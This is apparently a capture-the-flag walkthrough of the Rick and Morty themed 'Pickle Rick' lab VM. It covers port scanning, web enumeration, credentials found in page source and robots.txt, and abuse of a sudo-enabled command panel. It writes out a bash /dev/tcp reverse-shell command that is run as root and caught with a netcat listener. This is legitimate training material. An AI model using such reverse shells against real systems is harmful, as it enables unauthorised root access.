Pickle Rick

Rick and Morty themed VM with a web server.

This room can be found HERE.

Nmap

First, we launch an nmap scan.

nmap -sV -sC -p- $IP --min-rate=5000
nmap results
...
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ca:b4:fb:d9:51:93:12:59:8b:a8:6f:8a:80:47:57:77 (RSA)
|   256 b6:ac:c4:48:03:69:78:3b:c0:19:96:4f:11:6e:e6:88 (ECDSA)
|_  256 e3:3b:1b:8e:a6:ac:f5:ac:19:cb:bc:e5:16:4f:82:07 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Rick is sup4r cool
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We can see that ports 22 & 80 are open, let's checkout port 80 first.

Checking out the website

home page

This seems to be the home page, let's check the source of the page. Sure enough, there is something interesting here, a username:

source of the home page

Enumeration

Since this is a web server, let's enumerate the pages on this. I'll use dirsearch for this but gobuster can also be used.

dirsearch -u http://$IP
dirsearch results
...
200   588B   http://10.10.72.200/assets/
200   455B   http://10.10.72.200/login.php
200    17B   http://10.10.72.200/robots.txt
...

Login

It seems we have a login page, but let's check the robots.txt file. In this file we only have the text "Wubbalubbadubdub". Maybe this is the password for the login page. Let's check it out now.

login page

Let's try the username we got on the home page and the "Wubbalubbadubdub" string we got on the robots.txt file.

Sure enough, we are in!

portal page once logged in

Trying out commands

It seems we have a command panel where we can input commands. Let's try a simple ls first.

result of the ls command

It seems we have our first flag! Let's cat it so we get the content.

result of the cat command

We can see that the cat command is disabled, but we can easily work around this by using another command, such as less. First down, two to go. 🚩

Let's try some other commands, see what we can do. First let's find out who we are by running whoami.

result of the whoami command

Now let's see if we can do anything as sudo by running sudo -l.

result of the sudo -l command

Reverse shell

Okay! we can pretty much do anything, which means we can launch a reverse shell with root! Let's create the reverse shell and add execution privileges first (Reverse Shell Cheat Sheet). I'll type these commands into the command panel:

sudo echo "bash -i >& /dev/tcp/10.8.239.221/4444 0>&1" | sudo tee hello.sh
sudo chmod +x hello.sh

On my Kali machine, I'll launch ncat with nc -nlvp 4444. Then we can initiate the shell by typing sudo bash hello.sh into the command panel.

reverse shell initiation
listening on [any] 4444 ...
connect to [10.8.239.221] from (UNKNOWN) [10.10.72.200] 57232
bash: cannot set terminal process group (1347): Inappropriate ioctl for device
bash: no job control in this shell
root@ip-10-10-72-200:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)

And so we have a root shell!

Finding the remaining flags

Now let's search for the remaining flags. Let's check the /home directory first.

root@ip-10-10-72-200:/home# ls
rick
ubuntu

We can check Rick's home folder if there is anything interesting.

root@ip-10-10-72-200:/home# ls rick
second ingredients

Second flag done! 🚩

Something tells me the third flag is in the /root directory, so let's check it out.

root@ip-10-10-72-200:/home# cd /root
root@ip-10-10-72-200:~# ls
3rd.txt
snap

And there we go! We have all the flags 🚩

PreviousSimple CTFNextLazy Admin

Last updated